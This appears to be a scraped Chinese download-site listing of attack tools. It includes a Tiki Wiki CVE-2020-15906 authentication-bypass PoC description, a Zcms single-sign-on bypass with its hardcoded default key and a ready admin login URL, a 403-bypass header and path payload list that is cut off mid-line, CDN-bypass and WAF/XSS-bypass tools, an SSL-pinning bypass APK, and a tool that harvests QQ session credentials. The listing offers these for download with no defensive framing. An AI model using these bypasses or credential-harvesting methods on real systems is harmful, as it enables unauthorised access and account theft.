Tiki Wiki CMS Groupware 认证绕过漏洞CVE-2020-15906POC
Tiki Wiki CMS Groupware或简称为Tiki(最初称为TikiWiki)是一种免费且开源的基于Wiki的内容管理系统和在线办公套件。在如下这些版本21.2, 20.4, 19.3, 18.7, 17.3, 16.4前存在一处逻辑错误,管理员账户被爆破60次以上时将被锁定,此时使用空白密码即可以管理员身份登录后台。
2022-09-05 09:00:09
6KB
1
WebView_SSLPinning绕过实例的APK,已经编译好WebView_SSLPinning的两种证书加固(【证书文件校验】和证【书公钥校验】)的APK
2022-09-01 14:05:04
5.52MB
1
上传空间直接可运行同时获取SID、skey、P_skey、superkey,对于被封QQ空间的号码也能成功获取到登录信息。注意扫码无法获取SID。
2022-08-15 15:21:00
18KB
1
Get website IP address by scanning the entire net 通过扫描全网绕过CDN获取网站IP地址
2022-08-07 23:19:48
968KB
1
WEB 漏洞-XSS 跨站之 WAF 绕过及安全修复#常规 WAF 绕过思路标签语法替换特殊符号干扰提交方式更改垃圾数据溢出加密解密算法结合其他漏洞绕过#自动化
2022-08-03 13:01:26
368KB
1
认证绕过:Zcms单点登录认证缺陷
<%@page import="com.zving.platform.Login"%>
<%@page import="com.zving.framework.utility.StringUtil"%>
<%
String username = request.getParameter("u");
String time = request.getParameter("t");
String str = request.getParameter("s");
String key = "WIU%&*DJAJKL%^*W(DLJIST";
String s = StringUtil.md5Hex(username + time + key);
if (s.equals(str)) {
Login.ssoLogin(request, response, username);
}
%>
// key安装后缺省都是“WIU%&*DJAJKL%^*W(DLJIST”,可以计算出s登录后台
//SSO.jsp?u=admin&t=2010/1/11&s=f7edb87197b4437df8651ae320623006
提示:所有发布版不能用统一的缺省值来完成某些必须要执行的信息。
2022-07-26 16:55:24
25.5MB
1
BypassSuper
一款针对403/401页面进行快速、高效尝试Bypass的扫描工具
______ _____
| ___ \ / ___|
| |_/ /_ _ _ __ __ _ ___ ___ \ `--. _ _ _ __ ___ _ __
| ___ \ | | | '_ \ / _` / __/ __| `--. \ | | | '_ \ / _ \ '__|
| |_/ / |_| | |_) | (_| \__ \__ \/\__/ / |_| | |_) | __/ |
2022-07-13 10:37:57
13KB
1
第403章
一个burpsuite扩展名,用于绕过403受限制的目录。 通过使用PassiveScan(默认启用),此扩展名将自动扫描每个403请求,因此只需添加到burpsuite中即可。
有效负载:$ 1:HOSTNAME $ 2:PATH
$1/$2
$1/./$2
$1/$2/.
$1//$2//
$1/./$2/./
$1/$2anything -H "X-Original-URL: /$2"
$1/$2 -H "X-Custom-IP-Authorization: 127.0.0.1"
$1 -H "X-Rewrite-URL: /$2"
$1/$2 -H "Referer: /$2"
$1/$2 -H "X-Originating-IP: 127.0.0.1"
$1/$2 -H "X-Forwarded-For: 127.0.0.1"
$1/$2 -H "X-Re
2022-07-13 10:36:05
85KB
1